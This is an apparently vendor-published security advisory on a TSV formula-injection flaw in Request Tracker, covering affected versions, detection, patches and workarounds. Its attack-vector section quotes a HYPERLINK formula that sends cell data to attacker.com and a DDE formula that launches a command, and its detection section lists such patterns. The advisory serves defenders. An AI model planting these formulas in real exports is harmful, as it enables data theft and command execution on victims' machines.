CVE-2025-61873 Overview
CVE-2025-61873 is a CSV Injection vulnerability affecting Best Practical Request Tracker (RT), a widely-used open-source ticket tracking system. The vulnerability allows attackers to inject malicious formulas into ticket values that are executed when TSV (Tab-Separated Values) exports are opened in spreadsheet applications like Microsoft Excel or LibreOffice Calc.
CSV Injection, also known as Formula Injection (CWE-1236), occurs when untrusted data is embedded into CSV or TSV files without proper sanitization. When these exported files are opened in spreadsheet applications, any cells beginning with special characters like =, +, -, or @ may be interpreted as formulas and executed, potentially leading to data exfiltration or command execution on the user's system.
Critical Impact
Attackers can craft malicious ticket values that execute arbitrary formulas when exported TSV data is opened in spreadsheet applications, potentially compromising the security of users who process exported ticket data.
Affected Products
- Best Practical Request Tracker (RT) versions before 4.4.9
- Best Practical Request Tracker (RT) versions before 5.0.9
- Best Practical Request Tracker (RT) versions before 6.0.2
Discovery Timeline
- 2026-01-16 - CVE CVE-2025-61873 published to NVD
- 2026-01-16 - Last updated in NVD database
Technical Details for CVE-2025-61873
Vulnerability Analysis
This vulnerability falls under CWE-1236 (Improper Neutralization of Formula Elements in a CSV File), commonly referred to as CSV Injection or Formula Injection. The core issue lies in how Request Tracker handles user-supplied ticket data during the TSV export process.
When users export ticket data as TSV files, the application fails to properly sanitize or escape values that could be interpreted as spreadsheet formulas. An attacker with the ability to create or modify ticket values can inject payloads that will execute when an administrator or user opens the exported file in a spreadsheet application.
The attack requires several conditions to be met: the attacker must have permissions to create or modify ticket content, a victim must export ticket data as TSV, and the victim must open the exported file in a vulnerable spreadsheet application with formula execution enabled.
Root Cause
The root cause of this vulnerability is insufficient input validation and output encoding in the TSV export functionality of Request Tracker. When ticket data is exported, the application does not sanitize or prefix potentially dangerous characters (=, +, -, @, \t, \r) that spreadsheet applications interpret as formula indicators.
Proper mitigation requires either prefixing potentially dangerous values with a single quote (') or escaping special characters to prevent formula interpretation by spreadsheet applications.
Attack Vector
The attack is network-based and requires high privileges (ability to modify ticket data) along with user interaction (victim must export and open the file). The attack scenario typically unfolds as follows:
- An attacker creates a ticket or modifies an existing ticket's fields with a malicious payload such as =HYPERLINK("http://attacker.com/steal?data="&A1,"Click Here") or =cmd|'/C calc'!A0
- An administrator or user with export privileges generates a TSV export that includes the malicious ticket data
- The victim opens the exported TSV file in a spreadsheet application
- The spreadsheet application interprets and potentially executes the injected formula
The vulnerability has a changed scope, meaning successful exploitation can impact resources beyond the vulnerable component itself, potentially affecting the user's local system.
Detection Methods for CVE-2025-61873
Indicators of Compromise
- Ticket content containing formula-like strings beginning with =, +, -, or @ characters
- Unusual ticket submissions with embedded hyperlinks or external references in formula syntax
- Audit logs showing ticket modifications with suspicious character patterns
Detection Strategies
- Implement content scanning rules to detect formula injection patterns in ticket submissions
- Monitor for ticket values containing common injection patterns like =HYPERLINK, =CMD, or =IMPORTDATA
- Review exported TSV files for unexpected formula content before opening in spreadsheet applications
Monitoring Recommendations
- Enable detailed audit logging for ticket creation and modification events
- Monitor for bulk ticket exports by users and correlate with potentially suspicious ticket content
- Implement alerts for ticket content matching known CSV injection patterns
How to Mitigate CVE-2025-61873
Immediate Actions Required
- Upgrade Request Tracker to version 4.4.9, 5.0.9, or 6.0.2 or later depending on your installed branch
- Review existing tickets for potentially malicious content containing formula injection patterns
- Educate users about the risks of opening exported TSV/CSV files and enabling formula execution
Patch Information
Best Practical has released patched versions to address this vulnerability. Organizations should upgrade to the following versions:
- For RT 4.x series: Upgrade to version 4.4.9 or later
- For RT 5.0.x series: Upgrade to version 5.0.9 or later
- For RT 6.x series: Upgrade to version 6.0.2 or later
Detailed release information is available in the Best Practical Release Notes.
Workarounds
- Configure spreadsheet applications to disable automatic formula execution when opening external files
- Pre-process exported TSV files through a sanitization script before opening in spreadsheet applications
- Restrict TSV export functionality to trusted administrators only until patches can be applied
- Use CSV/TSV viewers that do not interpret formulas instead of full spreadsheet applications
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
